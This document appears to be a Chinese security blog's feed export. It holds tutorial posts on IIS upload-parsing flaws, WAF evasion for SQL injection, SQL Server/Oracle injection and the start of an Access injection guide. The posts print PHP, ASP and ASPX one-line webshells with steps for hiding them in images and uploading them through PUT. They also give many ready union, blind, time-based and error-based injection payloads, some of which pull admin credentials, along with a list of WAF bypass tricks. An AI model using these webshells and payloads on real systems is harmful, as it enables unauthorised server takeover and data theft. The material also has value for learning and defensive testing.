title="目录解析漏洞"></a>目录解析漏洞</h3><p>低版本的IIS(例如IIS6.0及以下版本)存在目录解析漏洞,如果在上传文件的路径下新建一个名为”.asp”的文件夹,那么上传到文件夹里面的所有文件都会被IIS视作asp文件来执行。即使代码层限制了上传文件的类型为png、gif、jpg等,我们也可以通过上传<strong>图片马</strong>的方式使IIS解析到<strong>一句话木马</strong>,再使用蚁剑、冰蝎等连接工具查看服务器目录,甚至执行命令。</p><p>如果CMS后台没有更改上传路径的功能,我们也可以使用burpsuite抓包来尝试出正确的上传路径。</p><p>一句话木马有哪些呢?</p><p>PHP:<code><?php @eval($_POST['pass']);?></code> ASP: <code><%eval request ("pass")%></code> ASPX:<code><%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%></code></p><p><em>这里的@符号意思是不报错,即使有错误也不报(掩耳盗铃),以免错误信息存入服务器日志,引起警觉。</em></p><p>那怎么生成图片马呢?用记事本、notepad++等程序打开正常的图片,并在最后加入一句话木马,保存即可。</p><h3 id="文件名解析漏洞"><a href="#文件名解析漏洞" class="headerlink" title="文件名解析漏洞"></a>文件名解析漏洞</h3><p>低版本的IIS(例如IIS6.0及以下版本)也存在文件名解析漏洞,如果把文件命名为”*.asp;.jpg”,则文件名在“;”后面的部分直接被忽略,也就是说当成 *.asp文件执行。上传的jpg文件则是我们提前写好的图片马。</p><h3 id="PUT攻击漏洞"><a href="#PUT攻击漏洞" class="headerlink" title="PUT攻击漏洞"></a>PUT攻击漏洞</h3><p>所谓put攻击,是指利用http1.1中新增加的put方法上传木马。如果服务器上有对应资源,则后上传文件的会覆盖掉之前的文件;如果没有,则服务器上新增该文件。所以往服务器上增加文件的操作一般使用post方法。</p><p>如果IIS服务器端开启了webdav服务,以及所有用户的写入权限,那么我们可以进行put攻击。我们先使用IIS PUT Scanner这款扫描器,扫描C段内可以进行put攻击的服务器。然后我们把要上传的小马改成txt后缀,再用桂林老兵的IIS写入工具,用put方式上传txt后缀的小马,提交数据包以后可以访问文件所在位置确定是否上传成功。如果上传成功,则用move方式改变刚上传小马的文件名和后缀(asp,aspx,php等),这样小马就成功地上传到了服务器,我们也可以利用小马进一步对目标服务器进行操作。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>在下一篇笔记中,我会总结出另外几种与中间件以及http请求头有关的文件上传漏洞。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>文件上传</tag>
</tags>
</entry>
<entry>
<title>SQL注入(四)--WAF绕过思路</title>
<link href="/2021/09/27/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E5%9B%9B%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/"/>
<url>/2021/09/27/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E5%9B%9B%EF%BC%89-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/</url>
<content type="html"><![CDATA[<h2 id="什么是WAF"><a href="#什么是WAF" class="headerlink" title="什么是WAF"></a>什么是WAF</h2><p>什么是WAF?WAF(Web Application Firewall),即网站应用防火墙,通过过滤和监视Web应用程序与Internet之间的HTTP通信来帮助保护Web应用程序。它通常可以保护Web应用程序免受跨站点伪造(CSRF/SSRF),跨站点脚本(XSS),文件上传和SQL注入等攻击。 WAF工作在OSI模型的第七层(即应用层),并非用于防御所有类型的攻击。</p><h2 id="WAF防御原理"><a href="#WAF防御原理" class="headerlink" title="WAF防御原理"></a>WAF防御原理</h2><p>简单来说,waf就是解析http请求,通过正则表达式匹配,检测http请求中的参数是否存在恶意的攻击行为,如果请求中的参数和waf中的规则库所匹配,那么waf则判断此条请求为攻击行为并进行阻断,反之则放行。</p><p>常见的SQL注入绕过WAF有两种方法:</p><p>一种是利用waf可能存在的http协议解析缺陷来绕过waf,另外一种是利用各种方式来包装sql注入语句进行混淆来绕过waf的规则库。</p><h2 id="常用手法"><a href="#常用手法" class="headerlink" title="常用手法"></a>常用手法</h2><p>注意:由于WAF产品会不停更新换代,拦截手法也一再升级,所以这里介绍的方法可能会过时,请各位师傅灵活运用!</p><p>1.加密解密:通常使用异或(xor)、md5加密payload。</p><p>2.编码解码:base64、hex、Unicode、URL······</p><p>3.等价(冷门)函数:例如<code>hex()</code>,<code>bin()</code>等价于<code>ascii()</code>,<code>mid()</code>,<code>substring()</code>等价于<code>substr()</code>,以此类推。</p><p>4.特殊符号:我们加进去一些特殊符号,数据库不会产生其他影响,举个例子我们要查询当前用的是什么数据库,那我们<code>select database();</code>就可以了,但是十有八九会被waf拦截,我们就可以在database的前面添加一些特殊符号,比如<code>~</code>,<code>!</code>,<code>{</code>,<code>\n</code>,单双引号之类的都可以。</p><p>5.注释符混用:众所周知,MySQL有多种注释符,例如<code>#</code>,<code>-- =</code>,<code>/**/</code>。</p><p>6.空格替换:SQL语句中的空格,可以用<code>+</code>,<code>:</code>或它们的URL编码进行替换。</p><p>7.换行符:在URL编码中,<code>%23</code>代表<code>#</code>号,<code>%0A</code>代表换行符。我们可以把它们加在payload里,起到迷惑waf的作用。</p><p>8.大小写绕过:例如<code>sElECt</code>,<code>dATaBasE()</code>。</p><p>9.双写绕过:例如<code>selselectect</code>。</p><p>10.拆分绕过:以联合注入为例,我们去掉了<code>union</code>发现waf不会拦截,但是去掉<code>select</code>,发现waf也不会拦截。只要这两个东西在一起使用的话,就会拦截,因为<code>union select</code>就是waf拦截掉的联合查询。</p><p>所以我们的绕过思路就是,不让这两个在一起,并且可以执行这个sql语句。比如说我们在<code>union</code>和<code>select</code>中都加上注释符,变成<code>uni/**/on /**/select </code>这样,以此类推。</p><p>再以查询当前数据库为例,我们先将<code>database()</code>拆开试试,我们先输入一个<code>database</code>,我们发现waf不会拦截,我们在单输入一个括号<code>(</code>,也不会拦截,因为这种写法是错误的。我们通过上面这个例子可以发现,拦截的不是<code>database</code>也不是<code>()</code>,拦截的是<code>database()</code>这个整体。所以绕过的思路应该是让<code>database</code>和<code>()</code>拆分,但是不能影响数据库的运行,如果实现这个的话,我们也就可以实现waf的绕过了。</p><h2 id="骚姿势"><a href="#骚姿势" class="headerlink" title="骚姿势"></a>骚姿势</h2><p>上面介绍了常用的手法,下面是我从其他师傅那里学到的骚姿势:</p><p>1.GET和POST同时请求</p><p>2.垃圾字符串</p><p>3.内联注释:例如<code>/*!50000aaa*/</code>的形式,当5000小于当前MySQL版本号的时候,注释不生效,当大于版本号的时候注释生效。</p><p>4.正则表达式函数(<code>regexp()</code>)</p><p>5.脚本语言特性:例如<code>%00</code>截断仅可用于aspx+mssql</p><p>6.关键字替换:<code>and</code>可以替换为<code>&&</code>,<code>or</code>可以替换为<code>||</code>,<code>(1,2)</code>可以替换为<code>from 1 to 2</code>。</p><p>实战中一般在本地搭建环境,安装上目标机器的waf,然后使用burpsuite或者自己编写的Python脚本进行模糊测试,判断过滤掉的字符有哪些。</p><p>暂时只能想到这么多了,如果师傅们有更好的思路,可以在评论区留言,谢谢!</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>模糊测试</tag>
<tag>SQL注入</tag>
</tags>
</entry>
<entry>
<title>SQL注入(三)--SQL server和Oracle注入</title>
<link href="/2021/09/21/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%89%EF%BC%89-SQL-server%E5%92%8COracle%E6%B3%A8%E5%85%A5/"/>
<url>/2021/09/21/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%89%EF%BC%89-SQL-server%E5%92%8COracle%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h1 id="SQL-server和Oracle数据库注入"><a href="#SQL-server和Oracle数据库注入" class="headerlink" title="SQL server和Oracle数据库注入"></a>SQL server和Oracle数据库注入</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>ms SQL是指微软的<a href="https://baike.baidu.com/item/SQL">SQL Server</a><a href="https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8">数据库服务器</a>,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个<a href="https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/1239101">数据库管理系统</a>,用于建立、使用和维护数据库。</p><p>Oracle Database,又名Oracle RDBMS,或简称Oracle。是<a href="https://baike.baidu.com/item/%E7%94%B2%E9%AA%A8%E6%96%87%E5%85%AC%E5%8F%B8/430115">甲骨文公司</a>的一款<a href="https://baike.baidu.com/item/%E5%85%B3%E7%B3%BB%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/11032386">关系数据库管理系统</a>。它是在数据库领域一直处于领先地位的产品。可以说Oracle数据库系统是目前世界上流行的<a href="https://baike.baidu.com/item/%E5%85%B3%E7%B3%BB%E6%95%B0%E6%8D%AE%E5%BA%93/1237340">关系数据库</a>管理系统,系统<a href="https://baike.baidu.com/item/%E5%8F%AF%E7%A7%BB%E6%A4%8D%E6%80%A7/6931884">可移植性</a>好、使用方便、功能强,适用于各类大、中、小<a href="https://baike.baidu.com/item/%E5%BE%AE%E6%9C%BA/5511409">微机</a>环境。它是一种高效率的、可靠性好的、适应高<a href="https://baike.baidu.com/item/%E5%90%9E%E5%90%90%E9%87%8F/157092">吞吐量</a>的数据库方案。</p><p><strong>注意:SQL server的最高权限是sa,Oracle的最高权限是dba。扩展:Windows的最高权限是system(不是admin!),Linux的最高权限是root。</strong></p><h2 id="注入方式"><a href="#注入方式" class="headerlink" title="注入方式"></a>注入方式</h2><h3 id="SQL-server"><a href="#SQL-server" class="headerlink" title="SQL server"></a>SQL server</h3><h4 id="联合查询注入"><a href="#联合查询注入" class="headerlink" title="联合查询注入"></a>联合查询注入</h4><p>1.老规矩,先判断是否存在注入点。</p><p>2.用order by猜列数,注意联合查询不会显示重复内容,所以有时要在union后面加all。</p><p>3.联合查询找回显位,注意这里有些不一样,因为SQL server需要指定数据类型,所以判断时需要加单引号。例如:<code>?id=1' union select null,'null',null #</code>假设有三列,这里猜测第二个为回显位,则用单引号包围第二个null。如果网页回显null,则说明第二个是回显位。多个回显位以此类推。</p><p>4.爆库</p><p>例如:<code>?id=1' union select null,(select db_name),null #</code></p><p>5.爆表</p><p>例如:<code>?id=1' union select null,(select top 1 字段名 from 库名.dbo.sysobjects where xtype='u',null #</code></p><p>其中sysobjects是SQL server独有表,u代表用户创建的表。</p><p>6.爆字段</p><p>例如:<code>?id=1' union select null,(select top 1 col_name(object_id('表名'),n) from sysobjects,null #</code></p><p>其中n代表第几列,一般第一列是id。</p><p>7.爆值</p><p>例如:<code>?id=1' union select null,(select top 1 字段名 from 表名),null #</code></p><p><em>扩展:</em></p><p><em>查看当前数据库版本:</em><code>?id=1' union select null,(select @@version),null #</code></p><h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><h4 id="其它方式"><a href="#其它方式" class="headerlink" title="其它方式"></a>其它方式</h4><p>sqlmap一把梭,或者超级SQL注入工具。</p><h3 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h3><h4 id="联合查询注入-1"><a href="#联合查询注入-1" class="headerlink" title="联合查询注入"></a>联合查询注入</h4><p>1.老规矩,先判断是否存在注入点。</p><p>2.用order by猜列数,注意联合查询不会显示重复内容,所以有时要在union后面加all。</p><p>3.联合查询找回显位,注意这里有些不一样,虽然Oracle也需要指定数据类型,判断方法与SQL server相同,但是Oracle规定每次查询时必须跟随表名。例如:<code>?id=1' union select null,'null',null from dual#</code></p><p>其中dual是Oracle独有表。</p><p>4.爆库</p><p>例如:<code>?id=1' union select null,(select instance_name from V$INSTANCE),null from dual #</code></p><p>5.爆表</p><p>例如:<code>?id=1' union select null,(select table_name from user_tables where rownum=1 and like '%关键词%'),null from dual #</code></p><p><strong>注意要加rownum=1,因为Oracle每次只能显示一条数据。关键词可能是user,admin之类的敏感词。</strong></p><p>6.爆字段</p><p>例如:<code>?id=1' union select null,(select column_name from user_tab_columns where rownum=1 and table_name='表名'),null from dual #</code></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">' union select null,(select column_name from user_tab_columns where rownum=1 and table_name='</span>表名<span class="hljs-string">' and column_name not in ('</span>字段名<span class="hljs-number">1</span><span class="hljs-string">','</span>字段名<span class="hljs-number">2</span><span class="hljs-string">',...,'</span>字段名n<span class="hljs-string">')),null from dual #</span><br></code></pre></td></tr></table></figure><p>7.爆值</p><p>例如:<code>?id=1' union select null,(select 字段名1,字段名2,...,字段名n from "表名"),null from dual #</code></p><p><strong>注意实际表名要加双引号。</strong></p><p><em>扩展:</em></p><p><em>查看当前数据库版本:</em><code>?id=1' union select null,(select banner from sys.v_$version where rownum=1),null from dual #</code></p><h4 id="布尔盲注-1"><a href="#布尔盲注-1" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>0x01 利用decode函数盲注</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">decode(字段或字段的运算,值<span class="hljs-number">1</span>,值<span class="hljs-number">2</span>,值<span class="hljs-number">3</span>)<br></code></pre></td></tr></table></figure><p>这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3。</p><p>当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多。</p><p>使用方法:</p><p>比较大小:<code>select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值</code></p><p>其中sign()函数根据某个值是0、正数还是负数,分别返回0、1、-1。</p><p>所以在注入中的应用如下:</p><p>判断当前用户: <code>?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --</code></p><p>如果是SCOTT用户则返回1,不是则返回0.</p><p>当然也可以用字符逐个猜解,利用到substr()函数</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?username<span class="hljs-operator">=</span>SMITH<span class="hljs-string">' and 1=(select decode(substr(user,1,1),'</span>S<span class="hljs-string">',1,0) from dual) --</span><br></code></pre></td></tr></table></figure><p>获取当前用户</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)<br></code></pre></td></tr></table></figure><p>获取当前版本</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> banner <span class="hljs-keyword">from</span> sys.v_$version <span class="hljs-keyword">where</span> rownum<span class="hljs-operator">=</span><span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure><p>获取当前admin表的帐号和密码</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> username<span class="hljs-operator">||</span>password <span class="hljs-keyword">from</span> admin)<br></code></pre></td></tr></table></figure><p>获取字符长度</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> length(<span class="hljs-keyword">user</span>) <span class="hljs-keyword">from</span> dual <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p>把上述语句替换开头的<code>user</code>即可。</p><p>例如,逐个猜解用户名:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">2</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'Y'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">3</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'S'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">4</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'T'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">5</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'E'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br><br>(<span class="hljs-keyword">select</span> decode(substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">6</span>,<span class="hljs-number">1</span>),<span class="hljs-string">'N'</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>) <span class="hljs-keyword">from</span> dual) <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p>可以辅助burpsuite半自动注入。</p><p>0x02 利用instr函数盲注</p><p>instr函数可以从一个字符串中查找指定子串的位置。例如:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> instr(<span class="hljs-string">'abcdefgh'</span>,<span class="hljs-string">'de'</span>) position <span class="hljs-keyword">from</span> dual<br></code></pre></td></tr></table></figure><p>返回结果是4,因为从1开始算,d排第四所以返回4。</p><p>在注入中的应用: <code>?id=1 and 1=(instr((select user from dual),'SYS')) --</code></p><p>0x03 逐字猜解(和以前一样,这里不再赘述)</p><h4 id="时间盲注-1"><a href="#时间盲注-1" class="headerlink" title="时间盲注"></a>时间盲注</h4><p>Oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:<code>(select count(*) from all_objects)</code>,对数据库中大量数据进行查询或其他处理的操作,这样的操作会耗费较多的时间,然后通过这个方式来获取数据。这种方式也适用于其他数据库。</p><p>0x01 利用DBMS_PIPE.RECEIVE_MESSAGE函数盲注</p><p>DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制。</p><p>首先,不能直接将该函数注入子查询中,因为Oracle不支持堆叠查询(stacked query)。其次,只有数据库管理员才能使用DBMS_LOCK包。</p><p>在Oracle PL/SQL中有一种更好的办法,可以使用下面的指令以内联方式注入延迟:<code>dbms_pipe.receive_message('RDS', 10)</code></p><p>DBMS_PIPE.RECEIVE_MESSAGE函数将为从RDS管道返回的数据等待10秒。默认情况下,允许以public权限执行该包。DBMS_LOCK.SLEEP()与之相反,它是一个可以用在SQL语句中的函数。</p><p>在注入中的应用:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span class="hljs-keyword">or</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span> dbms_pipe.receive_message(<span class="hljs-string">'RDS'</span>, <span class="hljs-number">10</span>)<span class="hljs-comment">--</span><br>?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span>dbms_pipe.receive_message(<span class="hljs-string">'RDS'</span>, <span class="hljs-number">10</span>)<span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p>如果页面延时10秒返回,即存在注入。这里可以暂时理解成DBMS_PIPE.RECEIVE_MESSAGE(‘任意值’,延迟时间)。</p><p>0x02 利用decode函数盲注</p><p>decode不仅可以在布尔盲注中运用,也可以用在延迟盲注中。</p><p>在decode注入里加入延时语句。这里加入了我们的dbms_pipe.receive_message函数。</p><p>例如:<code>?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual) --</code></p><p>当然,这里延迟的操作不一定用延迟函数,也可以使用花费更多时间去查询所有数据库的条目。</p><p>例如:<code>?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) and '1'='1'</code></p><p>通过这种明显时间差也能判断注入表达式的结果。</p><h4 id="报错注入-1"><a href="#报错注入-1" class="headerlink" title="报错注入"></a>报错注入</h4><p>使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式。</p><p><strong>utl_inaddr.get_host_name()进行报错注入</strong></p><p>utl_inaddr.get_host_address 本意是获取ip 地址,但是如果传递参数无法得到解析就会返回一个oracle 错误并显示传递的参数。</p><p>我们传递的是一个sql 语句所以返回的就是语句执行的结果。oracle 在启动之后,把一些系统变量都放置到一些特定的视图当中,可以利用这些视图获得想要的东西。</p><p>例如,爆出当前用户: <code>?id=1 and 1=utl_inaddr.get_host_name((select user from dual))--</code></p><p><strong>ctxsys.drithsx.sn()进行报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span>ctxsys.drithsx.sn(<span class="hljs-number">1</span>,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>XMLType()进行报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">upper</span>(XMLType(chr(<span class="hljs-number">60</span>)<span class="hljs-operator">%</span><span class="hljs-number">7</span>c<span class="hljs-operator">%</span><span class="hljs-number">7</span>cchr(<span class="hljs-number">58</span>)<span class="hljs-operator">%</span><span class="hljs-number">7</span>c<span class="hljs-operator">%</span><span class="hljs-number">7</span>c(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)<span class="hljs-operator">%</span><span class="hljs-number">7</span>c<span class="hljs-operator">%</span><span class="hljs-number">7</span>cchr(<span class="hljs-number">62</span>))) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>dbms_xdb_version.checkin()进行报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> dbms_xdb_version.checkin((<span class="hljs-keyword">select</span> banner <span class="hljs-keyword">from</span> sys.v_$version <span class="hljs-keyword">where</span> rownum<span class="hljs-operator">=</span><span class="hljs-number">1</span>)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>bms_xdb_version.makeversioned()进报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> dbms_xdb_version.makeversioned((<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>dbms_xdb_version.uncheckout()进行报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> dbms_xdb_version.uncheckout((<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>dbms_utility.sqlid_to_sqlhash()进行报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">SELECT</span> dbms_utility.sqlid_to_sqlhash((<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>ordsys.ord_dicom.getmappingxpath()进行报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span>ordsys.ord_dicom.getmappingxpath((<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual),<span class="hljs-keyword">user</span>,<span class="hljs-keyword">user</span>)<span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>decode()进行报错注入</strong></p><p>这种方式更偏向布尔盲注,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。</p><h4 id="其它方式-1"><a href="#其它方式-1" class="headerlink" title="其它方式"></a>其它方式</h4><p>sqlmap一把梭,或者超级SQL注入工具。如果遇到waf拦截,则需要修改sqlmap的脚本。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>脚本小子yyds!</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>SQL注入</tag>
</tags>
</entry>
<entry>
<title>SQL注入(二)--Access注入</title>
<link href="/2021/08/05/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%BA%8C%EF%BC%89-Access%E6%B3%A8%E5%85%A5/"/>
<url>/2021/08/05/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%BA%8C%EF%BC%89-Access%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h1 id="Access数据库注入"><a href="#Access数据库注入" class="headerlink" title="Access数据库注入"></a>Access数据库注入</h1><h2 id="数据库简介"><a href="#数据库简介" class="headerlink" title="数据库简介"></a>数据库简介</h2><p>Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是Microsoft Office 的系统程序之一。</p><p>Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。</p><p>注意:Access只有一个数据库,且一般搭配脚本语言ASP/ASPX。</p><h2 id="数据库结构"><a href="#数据库结构" class="headerlink" title="数据库结构"></a>数据库结构</h2><p>库(只有一个)->表->字段->值</p><h2 id="判断数据库类型"><a href="#判断数据库类型" class="headerlink" title="判断数据库类型"></a>判断数据库类型</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> msysobjects)<span class="hljs-operator">></span><span class="hljs-number">0</span><br></code></pre></td></tr></table></figure><p>其中msysobjects是access独有的表,且外部无法访问。如果报错,则为access数据库,正常就是msSQL(即SQL server)。</p><p>但是,access数据库没有注释符,所以只能采用%00截断的方式。如果PHP中开启了魔术引号,则要把查询内容转换为十六进制。</p><h2 id="开始注入"><a href="#开始注入" class="headerlink" title="开始注入"></a>开始注入</h2><h3 id="注入方法"><a href="#注入方法" class="headerlink" title="注入方法"></a>注入方法</h3><ul><li>联合查询</li><li>逐字猜解(盲注)</li></ul><h3 id="联合查询详细步骤"><a href="#联合查询详细步骤" class="headerlink" title="联合查询详细步骤"></a>联合查询详细步骤</h3><p>1.判断是否存在注入点:提交单引号或运用逻辑运算</p><p>例如:</p><p>提交单引号:<code>URL?id=1'</code>若报错,则存在注入点</p><p>逻辑运算:<code>URL?id=1' and 1=1#</code>正常,<code>URL?id=1' and 